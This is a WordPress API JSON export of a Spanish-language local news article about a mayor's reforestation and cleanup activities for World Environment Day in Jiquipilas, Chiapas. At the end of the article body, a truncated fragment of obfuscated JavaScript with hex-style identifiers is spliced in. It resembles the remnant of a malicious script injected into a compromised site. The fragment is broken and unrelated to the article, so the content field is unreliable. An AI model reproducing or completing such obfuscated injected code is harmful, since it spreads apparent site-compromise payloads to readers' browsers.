{"id":2705,"date":"2022-06-07T02:34:00","date_gmt":"2022-06-07T02:34:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2705"},"modified":"2022-06-07T02:34:01","modified_gmt":"2022-06-07T02:34:01","slug":"con-reforestacion-y-actividades-ecologicas-hugo-lazaro-conmemora-el-dia-internacional-del-medio-ambiente-en-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2705","title":{"rendered":"Con reforestaci\u00f3n y actividades ecol\u00f3gicas, Hugo L\u00e1zaro conmemora el D\u00eda Internacional del Medio Ambiente en Jiquipilas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"2706\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0031-1024x683.jpg\" alt=\"\" class=\"wp-image-2706\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0031-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0031-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0031-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0031.jpg 1296w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"2707\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0030-1024x768.jpg\" alt=\"\" class=\"wp-image-2707\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0030-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0030-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0030-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0030-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0030.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"2708\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0029-1024x683.jpg\" alt=\"\" class=\"wp-image-2708\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0029-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0029-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0029-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0029.jpg 1296w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u2022 Accion\u00f3 plan estrat\u00e9gico de limpieza, magna reforestaci\u00f3n y entrega de \u00e1rboles.<\/p>\n\n\n\n<p>\u2022 Se estar\u00e1n realizando diversas actividades de reforestaci\u00f3n y separaci\u00f3n de residuos.<\/p>\n\n\n\n<p>06 de Junio del 2022. Jiquipilas, Chiapas.- En el marco conmemorativo del d\u00eda internacional del medio ambiente, fecha de gran importancia para concientizar a la sociedad del da\u00f1o causado y sobre los m\u00e9todos de mejoramiento al planeta, el Alcalde C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez particip\u00f3 con m\u00faltiples actividades ecol\u00f3gicas.En compa\u00f1\u00eda de las y los colaboradores del ayuntamiento, efectuaron una magna reforestaci\u00f3n en los tramos de las entradas principales como \u201cLas Jotas\u201d, &#8220;Los Cacahuates&#8221; y \u201cLas Vegas\u201d zonas de gran impacto social y que estrat\u00e9gicamente fortalecer\u00e1 la ecolog\u00eda del municipio.Posteriormente, acudieron al tramo carretero denominado \u201cel manguito\u201d para realizar limpieza, levantamiento de pl\u00e1sticos y basura, promoviendo el cuidado del suelo y concientizando a no arrojar residuos en las v\u00edas de comunicaci\u00f3n.\u201cHay que ser rec\u00edprocos y conscientes los beneficios que la madre naturaleza nos favorece, debemos evitar da\u00f1arla contaminando los suelos con basura, evitando quemas, pasamos momentos dif\u00edciles y una manera de remediar es accionando actividades ecol\u00f3gicas; esta reforestaci\u00f3n dar\u00e1 grandes resultados aprovechando la temporada de lluvias y debemos respetar no da\u00f1ar los ejemplares\u201c puntualiz\u00f3.Tambi\u00e9n, gracias al di\u00e1logo y excelente comunicaci\u00f3n con el CAS Concesionaria de Autopistas del Sureste se logr\u00f3 la gesti\u00f3n de 1,800 \u00e1rboles como Primavera, orqu\u00eddea, Melina, mil y palmeras; Petrona Arcos Solis, responsable de medio ambiente del CAS dijo que es una gran aceptaci\u00f3n las que encabeza el edil a favor de Jiquipilas.L\u00e1zaro Rodr\u00edguez agradeci\u00f3 de igual manera el apoyo del la secretaria de la SAGyP Zaynia Andrea Gil V\u00e1zquez por donar \u00e1rboles para est\u00e1s actividades, al igual destac\u00f3 el respaldo y apoyo de la Arquitecta Mar\u00eda del Rosario Bon\u00edfaz Alfonso; Secretaria de Medio Ambiente e Historia Natural para realizar est\u00e1s acciones en beneficio del medio ambiente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Accion\u00f3 plan estrat\u00e9gico de limpieza, magna reforestaci\u00f3n y entrega de \u00e1rboles. \u2022 Se estar\u00e1n realizando diversas actividades de reforestaci\u00f3n y separaci\u00f3n de residuos. 06 de Junio del 2022. Jiquipilas, Chiapas.- En el marco conmemorativo del d\u00eda internacional del medio ambiente, fecha de gran importancia para concientizar a la sociedad del da\u00f1o causado y sobre &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2707,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-2705","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2705","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2705"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2705\/revisions"}],"predecessor-version":[{"id":2709,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2705\/revisions\/2709"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2707"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2705"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2705"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2705"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}